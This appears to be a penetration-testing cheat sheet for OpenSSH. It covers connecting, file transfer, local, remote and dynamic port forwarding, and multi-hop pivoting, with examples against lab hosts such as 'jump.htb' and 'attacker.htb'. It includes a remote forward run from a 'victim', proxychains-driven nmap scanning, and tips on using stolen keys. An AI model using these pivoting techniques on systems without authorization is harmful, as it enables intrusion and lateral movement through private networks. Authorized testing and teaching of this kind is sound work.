SSH Cheat Sheet
Secure shell for remote access, port forwarding, SOCKS proxies, and file transfer during authorized engagements.
Overview
OpenSSH provides encrypted remote shells, scp/sftp file transfer, and powerful local/remote/dynamic port forwarding for pivoting. Found on virtually every Linux server and many appliances.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
sudo apt install -y openssh-client openssh-serverssh -VEssential commands
Connect
ssh user@10.10.10.5ssh -i ~/.ssh/id_rsa user@10.10.10.5 -p 2222Copy files
scp file.txt user@10.10.10.5:/tmp/scp -r user@10.10.10.5:/var/log ./logs/SFTP interactive
sftp user@10.10.10.5Common workflows
Attacker: local 8080 → via jump → internal 172.16.1.10:80
ssh -L 8080:172.16.1.10:80 user@jump.htbcurl http://127.0.0.1:8080/On victim (if sshd GatewayPorts / AllowTcpForwarding allowed)
ssh -R 4444:127.0.0.1:4444 user@attacker.htbDynamic SOCKS proxy —
ssh -D 1080 -N user@jump.htbproxychains.conf: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 10.0.0.0/24ProxyJump (multi-hop) —
ssh -J user@bastion,user@internal user@targetSSH config snippet —
Host jumpHostName 10.10.11.10User adminIdentityFile ~/.ssh/jump_rsaLocalForward 3389 172.16.1.5:3389Keepalive / background tunnel —
ssh -fN -D 1080 user@jump # -f background, -N no commandssh -o ServerAliveInterval=60 user@hostFlags reference
-i KEY | Identity file |
|---|---|
-p PORT | Port |
-L local:remote:host:port | Local forward |
-R remote:local:host:port | Remote forward |
-D PORT | SOCKS5 on PORT |
-J host | ProxyJump |
-N | No remote command |
-f | Background |
-v | Verbose (debug auth) |
Tips
- Stolen keys: check chmod 600 on private key or SSH refuses.
- ssh -o PreferredAuthentications=password when testing creds (noisy).
- sshuttle routes whole subnets; SSH -D needs proxychains per tool.
- Hardening targets disable forwarding — look for AllowTcpForwarding no.